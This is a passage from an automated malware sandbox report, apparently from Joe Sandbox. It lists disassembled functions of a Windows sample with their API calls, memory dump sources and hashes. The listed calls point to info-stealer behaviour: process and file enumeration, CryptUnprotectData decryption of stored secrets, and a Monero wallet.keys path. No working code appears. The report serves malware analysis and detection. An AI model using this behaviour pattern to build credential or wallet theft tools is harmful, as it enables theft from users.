                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Zz$%.>i$&Nw[$/vO$3,6$@?_}$c@YR$,}>
                  • API String ID: 0-4019879789
                  • Opcode ID: d0a7e110e0bfca6ef5afc8f37cfe6bbc894ce311795e4aa91b742b7d690e0fe5
                  • Instruction ID: 8da7a39af3c44122696512f7de76b33c306c27dec5ae562365cf606cfe5b96e3
                  • Opcode Fuzzy Hash: d0a7e110e0bfca6ef5afc8f37cfe6bbc894ce311795e4aa91b742b7d690e0fe5
                  • Instruction Fuzzy Hash: 47B247F360C2049FE3046E2DEC8567AFBE9EFD4620F1A4A3DEAC4C3744E97558058696
                  Function 00937B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,009405AF), ref: 00937BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00937BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00937C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00937C62
                  • LocalFree.KERNEL32(00000000), ref: 00937D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: c48b78818de65fa11cf3b6020a218571619bf85ea1022db42761ba55bc5908fe
                  • Instruction ID: 136a7c5290e3a6aa55efefcb7383c94035a0d01840497ec1d0c5d2251a1431fc
                  • Opcode Fuzzy Hash: c48b78818de65fa11cf3b6020a218571619bf85ea1022db42761ba55bc5908fe
                  • Instruction Fuzzy Hash: 3F413D71940218ABDB24DB94DC99BEEB3B8FF84700F204199E10A73291DB742F85CFA1
                  Function 0092E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 0093A920: lstrcpy.KERNEL32(00000000,?), ref: 0093A972
                    • Part of subcall function 0093A920: lstrcat.KERNEL32(00000000), ref: 0093A982
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00940D73), ref: 0092E4A2
                  • StrCmpCA.SHLWAPI(?,009414F8), ref: 0092E4F2
                  • StrCmpCA.SHLWAPI(?,009414FC), ref: 0092E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0092EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 854a819ac2e9d551864334711c0a926e2bb35c97d0152d4cf296e5f74f78a00e
                  • Instruction ID: 1244e1c1788193dc33612e871342a215e259dbd4d405b81fb740f6b0ce540fbd
                  • Opcode Fuzzy Hash: 854a819ac2e9d551864334711c0a926e2bb35c97d0152d4cf296e5f74f78a00e
                  • Instruction Fuzzy Hash: 37123172910118ABDB18FB60DC96FEE7378AFD4300F4045A9B54AA6191EF346F49CF92
                  Function 00CE0AA8 Relevance: 9.1, Strings: 6, Instructions: 1583COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: %-g$34g6$V_vn$ksu$|ey?$~-36
                  • API String ID: 0-3917117089
                  • Opcode ID: 683db20287f2a1ff4465d71e7641caa5be54898a0e2eaeeaad9ae7571c069ae4
                  • Instruction ID: bf6166820bf5065a41692e20e04336b003383f6b96b378b47f6590cd5feb32ee
                  • Opcode Fuzzy Hash: 683db20287f2a1ff4465d71e7641caa5be54898a0e2eaeeaad9ae7571c069ae4
                  • Instruction Fuzzy Hash: 7DB215F390C2049FE7046F29EC8567AFBE9EF94720F1A493DEAC583344EA3558458687
                  Function 00CEAD77 Relevance: 7.9, Strings: 5, Instructions: 1664COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2|=$JtZ$M%H$jwl*$r+Ky
                  • API String ID: 0-660362512
                  • Opcode ID: a05c92b1f288b0f72a4d0add8e036c58558a5146d16af8ab432a314936ecd58d
                  • Instruction ID: f7dc3485f3e42bfbe51a4598c8a8c7189c7548c7a84f1f9367bc588bd74e06ee
                  • Opcode Fuzzy Hash: a05c92b1f288b0f72a4d0add8e036c58558a5146d16af8ab432a314936ecd58d
                  • Instruction Fuzzy Hash: 5BB277F3A0C2049FE3046E2DEC8567ABBE9EF94720F1A453DEAC4C3744EA7558058697
                  Function 0092C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0092C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0092C87C
                  • lstrcat.KERNEL32(?,00940B46), ref: 0092C943
                  • lstrcat.KERNEL32(?,00940B47), ref: 0092C957
                  • lstrcat.KERNEL32(?,00940B4E), ref: 0092C978
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 23abf8d079fcce78f1c66bf966b3eb96621931463ceef271a5d9bf85896ab7b3
                  • Instruction ID: b0dfa600a8ac42ec28a6f068ee887ab66140bbf6c6525e5ab83736cdb78aeed8
                  • Opcode Fuzzy Hash: 23abf8d079fcce78f1c66bf966b3eb96621931463ceef271a5d9bf85896ab7b3
                  • Instruction Fuzzy Hash: 014141B990421ADBCF10DFA4DD89BFEB7B8BB44704F1045A8E509A72C0DB755A84CF91
                  Function 00927240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0092724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00927254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00927281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009272A4
                  • LocalFree.KERNEL32(?), ref: 009272AE
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: c3ce5e13dbd9c4fc09936991601a3094dc3c465b1d71001aaca5cc44e32a1ba1
                  • Instruction ID: 3cc454083f55dbe8d7fddb08246807f7b6c6e840f0646f9085a3aa1aed3bab2c
                  • Opcode Fuzzy Hash: c3ce5e13dbd9c4fc09936991601a3094dc3c465b1d71001aaca5cc44e32a1ba1
                  • Instruction Fuzzy Hash: 1E011275A40308BBDB10DFD4DD45F9D77B8EB44704F104558FB05BB2C0DAB4AA008B65
                  Function 00939600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                  Download Yara Rule
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0093961E
                  • Process32First.KERNEL32(00940ACA,00000128), ref: 00939632
                  • Process32Next.KERNEL32(00940ACA,00000128), ref: 00939647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0093965C
                  • CloseHandle.KERNEL32(00940ACA), ref: 0093967A
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: bdda154954ad97c0a0295bb97afa6ec6fb01f2c71af1916eef0b1e9c1531ab95
                  • Instruction ID: 211be6c817ed013fda3e7edffaddda7042ef8497ea3537e3fa8cf08b80e6eead
                  • Opcode Fuzzy Hash: bdda154954ad97c0a0295bb97afa6ec6fb01f2c71af1916eef0b1e9c1531ab95
                  • Instruction Fuzzy Hash: 03010C75A01208ABCF14DFA5CD99BEDB7F8EB48304F104188E909A7290DBB8AF40DF51
                  Function 00CE977A Relevance: 7.5, Strings: 5, Instructions: 1211COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0k$_$w_$e^^$}\=o$m{m
                  • API String ID: 0-3038091240
                  • Opcode ID: 78441b5d05dcf85b942691049d0df88c9f7abf123d459e7b5f2d90e4a00bbf46
                  • Instruction ID: f8d7dc368a922e72dd2bed287c8c54b064d6f80a24fa9de551af5f3dd8295aff
                  • Opcode Fuzzy Hash: 78441b5d05dcf85b942691049d0df88c9f7abf123d459e7b5f2d90e4a00bbf46
                  • Instruction Fuzzy Hash: A282D6F3A08204AFE3146E2DEC8577AFBE9EF94760F16493DE6C483744E63558048697
                  Function 00CEE3E6 Relevance: 6.6, Strings: 4, Instructions: 1557COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: <E_$\I~k$tB;r$~W
                  • API String ID: 0-3662467418
                  • Opcode ID: 6d2c3baf2c5a61bdd1c4c486394a6583085dba1082155fa1203ada94b9e0231a
                  • Instruction ID: 08096f7b96796058cc4ddef12bfb77240a08519c4eec730c2fb7f125de015a18
                  • Opcode Fuzzy Hash: 6d2c3baf2c5a61bdd1c4c486394a6583085dba1082155fa1203ada94b9e0231a
                  • Instruction Fuzzy Hash: 71B2E7F3A082009FE304AE2DEC8577ABBE5EF94720F1A493DEAC4C7744E63558158697
                  Function 00938680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009405B7), ref: 009386CA
                  • Process32First.KERNEL32(?,00000128), ref: 009386DE
                  • Process32Next.KERNEL32(?,00000128), ref: 009386F3
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • CloseHandle.KERNEL32(?), ref: 00938761
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: 93cca1786e3d8782148aebd74c733bd76ed6f7ce522cd54b00ef082601312851
                  • Instruction ID: 9731a1bb8338f3673f9fcd833c87b638c8915252d79707b5937d07826f51fd2c
                  • Opcode Fuzzy Hash: 93cca1786e3d8782148aebd74c733bd76ed6f7ce522cd54b00ef082601312851
                  • Instruction Fuzzy Hash: 08314871901218ABCB24EF54DC95FEEB7B8EB85700F104199F10AB21A0DF746E45CFA2
                  Function 00938EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00925184,40000001,00000000,00000000,?,00925184), ref: 00938EC0
                  Memory Dump Source
